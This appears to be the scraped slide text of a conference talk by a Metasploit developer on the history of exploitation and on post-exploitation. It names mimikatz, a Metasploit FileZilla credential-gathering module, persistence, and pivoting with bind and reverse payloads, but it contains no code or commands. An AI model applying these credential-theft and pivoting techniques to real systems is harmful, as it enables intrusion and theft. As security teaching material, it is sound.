37
You’re Already 0wned James Lee

already-0wned

  • Upload
    egypt

  • View
    77

  • Download
    0

Embed Size (px)

Citation preview

You’re Already 0wnedJames Lee

Think Like an Attacker

# whoami

@egyp7Metasploit developerAttackerErstwhile:

reverse engineervuln researcherpenetration tester

A Brief History of Exploitation

Golden Era (up to mid-late 1990s)Silver Era (mid-late 1990s to mid 2000s)Modern Era (late 2000s to now)

Golden Era

Centralized ComputingUniversities, Research Orgs

Golden Era Exploitation

PasswordsWar dialingWhistling into phones launching ICBMsConfiguration errors

Silver Era (mid 1990s)

Practical portable systemsRise of WiFiMuch greater use of technical mitigation

Silver Era Exploitation

PasswordsThe rise of client-sidesThe rise of web exploitation

The Age of Worms

Email Worms

ILOVEYOUSircamSobigMyDoom

Server-side Worms

ms00-078 IIS, solaris sadminms01-033 IIS(big list of vectors)ms02-039 SQLServerms03-026 dcomms04-011 lsassms05-039ms08-067

SadmindCode Red

NimdaSlammer

BlasterSasser

ZotobConficker

The web is the InternetUbiquitous mobile computingSecure Development Lifecycle (SDLC)

Modern Era

An exploit converts illegitimate access into

legitimate access

Converting Access

Web applicationsPhishingApp Servers, legit admin stuff

Trust relationships

Single Sign OnKerberosSSH keys, ssh-agent

The Three Ps

Post Exploitation

Presence

DemoSteal all the Passwords

mimikatz

DemoSteal all the Passwords

post/multi/gather/filezilla_client_cred

Persistence

Pivoting

Pivoting

Two* methods in Metasploit● Route● Portfwd

* Mostly

Exploit

Payload

With Bind Payload

With Reverse Payload

Payload

DemoReverse Pivoting

Exploit

Payload

DemoBind pivoting

Modern Era Exploitation...

Very much like old school exploitation

Questions?

@[email protected]